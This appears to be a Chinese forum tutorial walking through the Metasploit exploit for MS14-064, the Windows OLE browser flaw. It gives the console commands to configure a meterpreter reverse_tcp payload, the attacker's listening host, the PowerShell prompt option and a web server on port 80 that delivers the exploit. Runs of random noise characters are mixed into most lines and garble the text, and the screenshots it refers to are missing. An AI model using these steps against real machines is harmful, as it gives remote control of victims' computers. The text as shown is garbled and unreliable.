9 V7 P Z1 E/ `* ?1 j4 T3 }2 e
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示: U& X C* K$ W6 g4 D
. N; w9 U& N& \6 J5 f, v5 _; \1 d s5 G" A* h, ?; e
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
5 L0 F/ A3 }" L1 R( H, o
7 C. O* X- h# q8 q, w
( K' c" q% b+ ^ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
! ]* l* x! {5 o$ d, @# |( w5 @: Q' @
, X9 T5 d& j3 |! J1 r! b1 ]9 Z* k/ C/ ~) |" m2 @. H
set AllowPowershellPrompt true
! S# \% P8 V# R* f/ B6 n
" [- o7 a, b$ b: l5 |
) M6 @8 k/ T6 `. y$ X4 l2 w" t; ]0 U8 W
Set LHOST 192.168.0.109
( d' X3 s! F) F. v+ F) S
7 ]0 g; c& T9 {+ n, @8 F7 e- I
" A6 h( Y4 @+ g. u" @/ `" W1 P
set SRVHOST 192.168.0.109
9 F. y' V( K; U3 u4 r- ]( `
7 b( ?4 Y4 s) a1 K) n7 T' T' p% }2 ~3 R& P6 X$ u, w
Set uripath share1 ]5 S! E( g. B
' P/ P* G) U9 H& v) p$ _1 Z: Y2 D) F4 m
. Z/ ]7 w8 D: H6 X Set srvport 80: ^# s$ A- S5 R* z- ^! T% R8 m
) s9 i' T. ]! u
% F, k9 Q' O5 s
# K0 H) t! I: u3 P4 d' |7 Y. D
/ b$ s# [) l$ Y. J! e& \) k( R/ _5 S# c$ ~
7 w, Q- e; F% s4 z D
: R* [% K$ ` O2 z7 L2 [
* O! R1 d7 a5 M9 e. u$ r
) j% I& v4 m1 p4 U
6 Z2 m# M! p# r c5 K7 t( ^
% o! P0 N" e$ o# W2 M: Q) \ 3 D8 r" o) J/ Z
9 H) W# H) z. g, }* [( N
* p) D3 K4 O) I' i }. D 7 p; Z r- L! }/ c- e+ j
3 l- f$ z- \" W8 Z3 q
* }4 w& _# s: i' {% E/ o/ [ 下面我们来访问本地地址如图:
" P, }! W" q1 a7 L3 q
$ g) A$ I; {0 U$ A; V6 y+ K) u
) n; `# Y+ p4 c+ w
) \1 M) Z8 e5 n2 H- A, S% K
+ n& \& I4 a8 s- [5 h( z! Y8 a- h% s2 X
8 y' i3 c. i$ H3 I1 P0 ~
3 k9 ]8 Q+ f D9 M
2 h, x9 @; w# h/ h$ o: _4 Q
' g5 c1 [3 @7 n0 x- G8 Y8 n. p& R
& r+ V; \ u. F! x' I8 j! `6 f+ ~! ^% X